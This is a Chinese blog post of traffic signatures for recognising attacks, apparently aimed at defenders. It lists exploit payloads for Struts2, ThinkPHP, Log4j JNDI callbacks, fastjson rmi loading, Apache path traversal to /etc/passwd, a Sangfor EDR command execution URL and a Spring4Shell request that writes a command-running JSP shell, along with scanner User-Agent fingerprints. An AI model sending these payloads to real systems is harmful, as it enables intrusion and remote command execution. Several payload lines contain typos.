标签：pipeline parent 特征 module 流量 Agent context resources

一些流量特征整理

Apache Struts2(CVE-2017-5638)

Content-Type : %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader("lywa2mzr, '1')}. multipart/form-data

thinkphp

• GET /?s=/Index/\think\app/invokefunction*function=call_user_func_array&vars[0]=md5&vars[1][]=lywq2mzr

• ThinkPHP6任意文件操作

  GET / HTTP/1
  Cookie: PHPSESSID=../../../../public/877114455.php
  

• ThinkCmf模板注入

  GET /?a=display&templateFile=README.md HTTP/1 
  

  GET //a?=display&templateFile=config.yaml HTTP/1

• ThinkPHP命令注入

  POST /?s=captcha&test=-1 HTTP/1.1
  ....
  
  _method=__construct&filter=phpinfo&method=get&server[REQUEST_METHOD]=1
  

Log4j

${jndi;ldap://xxx.ceye.io/ypgq}

深信服EDR设备RCE

https://ip+端口/tool/log/c.php?strip_slashes=system&host=id

#id就是执行的Linux命令

Apache路径遍历CVE-2021-41773

http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

扫描器指纹特征

FUZZ工具：
User-Agent：Fuzz Faster U Fool v1.3.1

AWVS：
1.User-Agent:WAIFOR DELAY
2.Accept:acunetix/wvs

zgrab：
User-Agent: Mozilla/5.0 zgrab/0.x

绿盟扫描器：
url：nsfocus
User-Agent: Mozilla/4.75 [en] (X11,U;Rasa)

sqlmap:
USER-AGENT: sqlmap/1.5.8#stable (http://sqlmap.org)

appscan:
Content-Type: Appscan
Content-Type: AppScanHeader
Accept: Appscan
User-Agent:Appscan

nessus:
url：nessus
headers：nessus
body：nessus

蚁剑:
antSword/v2.1

fastjson

payload1：{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi:/ip:port/Exploit","autoCommit":true} 
payload2：
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ip:port/Exploit","autoCommit":true}}";

Spring Core RCE(CVE-2022-22965)

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

标签：pipeline,parent,特征,module,流量,Agent,context,resources
From： https://www.cnblogs.com/kanninabixing/p/16810151.html